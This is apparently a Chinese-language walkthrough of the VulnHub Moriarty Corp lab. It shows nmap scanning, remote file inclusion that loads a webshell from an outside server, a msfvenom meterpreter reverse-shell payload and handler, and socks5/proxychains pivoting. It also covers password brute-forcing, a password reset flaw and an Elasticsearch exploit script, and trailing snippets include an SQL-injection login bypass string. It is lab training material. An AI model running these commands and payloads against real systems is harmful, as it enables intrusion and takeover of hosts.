<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    靶場攻略 | Moriarty Corp滲透測試

    VSole2023-03-13 11:37:07
    本文作者:a-running-snail(貝塔安全實驗室)

    Moriarty Corp靶場環境包含一臺外網服務器和三臺內網主機,攻擊者需先對外網服務器進行web攻擊,依據提交flag后的提示信息,逐步獲取內網主機權限。本次靶場環境包含以下10個關鍵部分:

    靶場環境

    暴力破解

    主機發現

    文件上傳

    文件包含

    SSH弱口令

    payload反彈

    任意密碼修改

    添加代理

    遠程代碼執行

    內網探測

    個人總結

    1.  靶場環境

    本次所使用的攻擊機為kalilinux系統,攻擊過程中涉及到的工具主要有:公網主機VPS,中國菜刀/中國螞劍,burpsuite,msf,MobaXterm,一句話木馬,proxychains,nmap,searchsploit,exp腳本等。攻擊的拓撲結構如下圖所示。

    注意: 外網服務器(8000端口)為提交flag以及攻擊提示處,并不存在漏洞,請不要進行攻擊行為。Flag的存儲格式為#_flag.txt,通常存儲在服務器的不同目錄下面。每次提交flag后都會給相關提示和說明。開始滲透之前須向外網服務器(8000端口)提交flag{start},表示攻擊開始正常啟動。本次實驗的虛擬機采用virtual box.

    詳細靶場說明請參考:

    https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/靶場下載地址:Download (Mirror):https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ovaDownload (Torrent): https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova.torrent
    

    2.  主機發現

    通過arp(地址解析協議)進行局域網內主機發現,arp是根據IP地址獲取物理地址的一個TCP/IP協議。主機發送信息時將包含目標IP地址的ARP請求廣播到網絡上的所有主機,并接收返回消息,以此確定目標的物理地址;收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間。

    >>> namp -sn -PR -T 4192.168.124.0/24
    

        -sn:只進行主機發現,不進行端口掃描。

        -PR:ARP Ping。

        -T:指定掃描過程使用的時序,總有6個級別(0-5),級別越高,掃描速度越快,在網絡通訊狀況較好的情況下推薦使用T4。

    3.  文件包含

    通過訪問頁面http://IP/file=name.html,可猜測為目錄遍歷或者文件包含漏洞,如下為漏洞驗證結果。

    文件包含漏洞,通常分為本地文件包含和遠程文件包含。本地文件包含,通常需要能夠寫入webshell的文件進行包含,進而獲取shell權限。遠程文件包含,可對遠程寫入webshell的文件進行包含,獲取shell權限。如下為遠程服務器test.txt文件寫入phpinfo();

    訪問頁面對遠程主機的test.txt文件進行包含,驗證遠程文件漏洞真實存在。這樣可以在遠程服務器寫入webshell進行包含,進而獲取Moriarty Corp服務器的主機shell權限。

    如下所示,通過菜刀直接連接后,可以獲取到shell權限。通過查看目錄,在根目錄查看到1_flag.txt。

    木馬文件鏈接地址:http://192.168.124.14/?file=http://xx.xx.xx.xx/snail.txt

    將獲取到的flag內容進行提交后,Moriarty Corp靶場給出新的提示。如下圖所示,提示內網環境中存在重要的網站,里面存在要獲取的flag信息,并且告知內網范圍在172.17.0.3-254段。由此,開始步入后滲透攻擊階段,由于靶場環境主要以linux系統環境為主,故此處后滲透工具在此處選擇metasploit工具為主。

    4.Payload反彈

    攻擊機進行監聽設置(注意:監聽主機設置需要與生成的payload保持一致):


    >>> useexploit/multi/handler>>> set payloadslinux/x64/meterpreter_reverse_tcp>>> set LHOST192.168.124.15        #監聽主機ip地址>>> set PORT 9999                  #監聽主機端口號>>>exploit -j
    

    生成反彈需要的payload文件:


    >>> msfvenom -plinux/x64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
    

     

    將生成的文件上傳到目標主機,并更改payload可執行權限,并執行。


    >>> chmod 777 shell.elf>>> ./shell.elf
    

    在攻擊端,監聽的主機收到目標主機反彈的shell權限,如下圖所示:

    5.  添加代理

    根據提交flag后系統反饋的提示說明,需要我們對內網的web應用網站進行滲透攻擊,此時為了能夠訪問到內網,需要進行添加代理操作。查看當前路由有一個內網段ip地址段位172.17.0.0/24。

    執行指令添加路由操作。


    >>>run autoroute -s 172.17.0.0/24
    

    添加socks5代理:


    >>>use auxiliary/server/socks5>>>run
    

    此處應用proxychains工具,進行內網探測,使用編輯器在文件/etc/proxychains.conf的最后一行加入socks5代理的配置信息。


    ---  snippet ---[ProxyList]#  add proxy here ...#  meanwile#  defaults set to "tor"socks5  127.0.0.1 1080
    

    6. 內網探測

    通過執行代理工具proxychains,對Moriarty Corp內網web服務進行探測,可以發現主機ip地址為172.17.0.4。執行指令如下所示:


    >>>Proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T4 -p80
    

    7.暴力破解

    此時通過瀏覽器是不能訪問到內網服務器,需要在瀏覽器配置代理進行訪問,配置代理類型選擇socks5,本地端口為1080。配置好以后,就能通過代理訪問內網web應用了。

    通過瀏覽頁面可發現,為一個文件上傳頁面,但是上傳需要輸入口令,方可操作成功。此時考慮可通過burpsuite進行攔截后,口令破解。

    打開burpsuite后,需要添加代理,這樣才能將攔截到的數據正確發送到目標服務器,配置過程如下所示:

     

    對攔截的數據更改口令字段,添加常用字典,此處用的字為:top1000.txt。查看破解成功字段的真實口令為password。

    8.文件上傳

    如下圖所示,成功將木馬上傳至服務器:

    常用的菜刀,Cknife等工具并不存在代理功能,此處使用中國蟻劍工具進行連接,配置蟻劍代理如下所示:

     

    成功連接到內網的shell后,訪問目標系統不同目錄,獲取第二個flag文件:2_flag.txt

    9. SSH弱口令

    將獲取到的flag內容進行提交后,Moriarty Corp靶場給出新的提示。如下圖所示,給出幾個用戶名和密碼hash值。對內網中的ssh服務進行弱口令猜解。

    通過第三方網站,對給出的hash值進行破解,如下所示為破解的hash結果:

    對內網的22端口進行探測,發現主機172.17.0.8開放22端口,并對該內網主機進行ssh弱口令猜解。


    >>>proxychains nmap -sV -t -Pn -p22 127.17.0.0/24
    

    通過第三方工具MobaXterm添加代理后,遠程連接到內網主機,具體操作過程如下所示:

    猜解成功后,獲得當前內網主機的基本權限,訪問目錄后的3_flag.txt。查看并進行提交。

    10. 任意用戶密碼修改

    將獲取到的flag內容進行提交后,Moriarty Corp靶場給出新的提示。如下圖所示,提示說存在一個聊天網站,管理員的聊天記錄可能存在有價值的信息。并給出服務器開放端口可能在443,8000,8080,8888。

    對內網的443,8000,8080,8888端口進行探測,發現主機172.17.0.9開放8000端口,并對該內網主機web應用進行訪問。


    >>>proxychains nmap -sV -t -Pn -p443,8000,8080,8888 127.17.0.0/24
    

     

    根據提示給出的用戶名和口令進行登陸,查看網站具有兩個功能,可以查看chats聊天記錄,可以更改用戶名密碼。嘗試抓包,通過更改用戶名為管理員,設置口令。此時如果存在任意用戶名口令更改漏洞,此時就可以把管理員登陸密碼從新設置。

    更改后,便可以以管理員身份進行登陸了。通過訪問chats可以查看到另外一個flag信息。

    將獲取到的flag內容進行提交后,Moriarty Corp靶場給出新的提示。如下圖所示,文中提到一個web應用Elasticsearch。嘗試百度查詢了一下,該服務默認運行在9200端口,并存在框架漏洞。

    11. 遠程代碼執行

    對內網的9200端口進行探測,發現主機172.17.0.10開放9200端口,并對該內網主機web應用進行訪問。


    >>> proxychains nmap -sV  -sT  -Pn -p9200 127.17.0.0/24
    

    依據kali自帶功能searchsploit功能進行版本漏洞搜索:


    >>>searchsploit elasticsearch
    

    使用36337.py腳本執行遠程代碼執行攻擊,獲取shell權限

    通過查看目標主機目錄,獲取flag信息6_flag.txt。

     

    12.個人總結

    Moriarty Corp靶場涉及到了web攻擊到內網漫游的基本環節,在每一個相關環節作者都給予了提示,漏洞利用方式較為簡單。提交完漏洞結束后,就像服務器提示所說被拉入黑名單了,再次訪問發現已被拉黑。

    滲透測試
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    中國蟻劍使用Electron構建客戶端軟件,Electron實現上用的是Node.js,并且Node.js能執行系統命令,故可以利用蟻劍的webshell頁面嵌入js來直接執行命令,進而釣魚來上線CS。(類似Goby,Goby也是使用Electron構建客戶端軟件)
    本文整理并盤點了每個安全測試人員都應該熟悉的十大頂級安全滲透測試工具。
    由于測試過程中很多系統我們能接觸到的只有一個登陸界面,所以要充分挖掘漏洞,進行深入操作登錄 注冊萬能密碼繞過登錄存在 SQL 注入的情況下,有可能使用萬能密碼直接登錄admin' or '1'='1'--. 有超級多登錄口 SQL 注入存在 SQL 注入的話直接注出賬密有些可以構造用戶注入登錄,比如熊海 cms 后臺登錄處存在 sql 注入$login=$_POST['login'];
    目前支持的功能有:爬蟲、目錄爆破、端口探測、C段探測、子域名探測、fastjson檢測、xss探測、指紋識別、漏洞掃描、漏洞告警。
    旨在確定組織的用戶群對魚叉式網絡釣魚攻擊的敏感性。這些評估的結果可以用于增強組織的反社會工程意識計劃。在此評估類型中,測試人員會將部署看似普通的USB驅動器,并誘使用戶將該設備插入公司系統。在此評估期間,組織通常會向測試人員提供憑據訪問權限,以審查整個應用程序。這類測試通常會在安全團隊大多數成員完全不知情的情況下執行。紅藍對抗測試有多種形式。有時藍隊被告知模擬或滲透測試的時間,有時則完全不知情。
    以下所有插件直接goolge 訪問即可安裝HackBar功能有網址的載入訪問,聯合查詢,各種編碼,數據加密功能等。HackBar可以幫助我們測試SQL注入,XSS漏洞和網站的安全性,主要是幫助滲透測試人員做代碼的安全審計,檢查代碼,尋找安全漏洞。hl=zh-CNProxy SwitchyOmega代理IP一鍵切換下載地址:https://chrome.google.com/webstore/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif?
    滲透測試是指安全專業人員在企業的許可下,對其網絡或數字化系統進行模擬攻擊并評估其安全性。
    滲透測試輔助工具箱
    2023-05-12 14:08:08
    刪除記錄:刪除指定id主頁面MSF頁面正則表達式頁面小工具頁面0x03 免責聲明本工具僅能在取得足夠合法授權的企業安全建設中使用,在使用本工具過程中,您應確保自己所有行為符合當地的法律法規。該工具僅用于學習交流,如您在使用本工具的過程中存在任何非法行為,您將自行承擔所有后果,本工具所有開發者和本公眾號不承擔任何法律及連帶責任。
    先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個服務端返回200的狀態碼,即表面成功找到一個在HOST白名單中的子域名。和 X-Rewrite-URL 標頭繞過 Web 服務器的限制。通過支持 X-Original-URL 和 X-Rewrite-URL 標頭,用戶可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 請求標頭覆蓋請求 URL 中的路徑,嘗試繞過對更高級別的緩存和 Web 服務器的限制Request
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类